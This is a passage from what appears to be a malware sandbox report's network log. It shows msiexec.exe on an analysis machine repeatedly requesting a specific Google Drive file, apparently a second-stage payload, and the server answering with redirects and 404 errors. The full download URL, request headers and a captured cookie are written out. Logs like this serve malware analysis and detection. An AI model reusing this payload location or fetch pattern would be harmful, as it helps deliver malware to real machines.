                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.650003142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:09 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:10 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgQoLyRS-oHiXpoR-g1-L-qKmBl47C5EWq_XcAWQcCaeMrxPDUk9D6ED7V5Slzvkpf-fY6aklD4
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:10 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-bFacEBQz5V1q2gFCLXxOlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 4b 33 65 69 42 71 59 7a 52 32 6a 76 63 34 72 6c 5a 6a 79 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yK3eiBqYzR2jvc4rlZjybg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.650004216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:10 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:11 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:11 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-Fx6eWkeSD496QbzAlVtsMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.650005142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:12 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:12 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgTIA-DAD5ppr2Ew3ud8I1TasNDxcu57noXqm06gXL9frYRWPnD28npAj0goAJY_SHSrU5sQNLY
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:12 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-a_T3o6AIl95uqzSDAnQTKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 4d 4f 37 57 55 37 42 48 4d 54 39 32 5a 4a 42 5a 66 64 67 4a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vMO7WU7BHMT92ZJBZfdgJw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.650006216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:13 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:13 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:13 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-qRs1tGL9m3otMb9Tn0cUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.650007142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:14 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:14 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgRz0BZ16If8xH-NhFrbrc1_6R2IGeavS6YAiLSlCAa1djZsm5nANo5CcPkX7yF2clHL
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:14 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-CxU-PktmcSjKlemqmuCGzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 5a 6d 2d 63 5a 6f 6f 4d 35 61 48 32 4a 57 62 35 35 52 6f 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mZm-cZooM5aH2JWb55RoOw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.650008216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:15 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:15 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:15 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-AjW_XKAcpT_EkpzcVPy02g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.650009142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:16 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:17 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgScc9gfCOBOp-bO5kD6x936NuwmP0KNjRIJuiPBHC2lwUlcJ1WdB4zKYdynfBJjj_xZ
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:16 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-B8QuXgxITK5E3kt4cGdvzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 58 6c 38 4d 61 62 77 59 76 65 47 78 35 75 2d 32 47 4a 72 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LXl8MabwYveGx5u-2GJryg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.650010216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:17 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
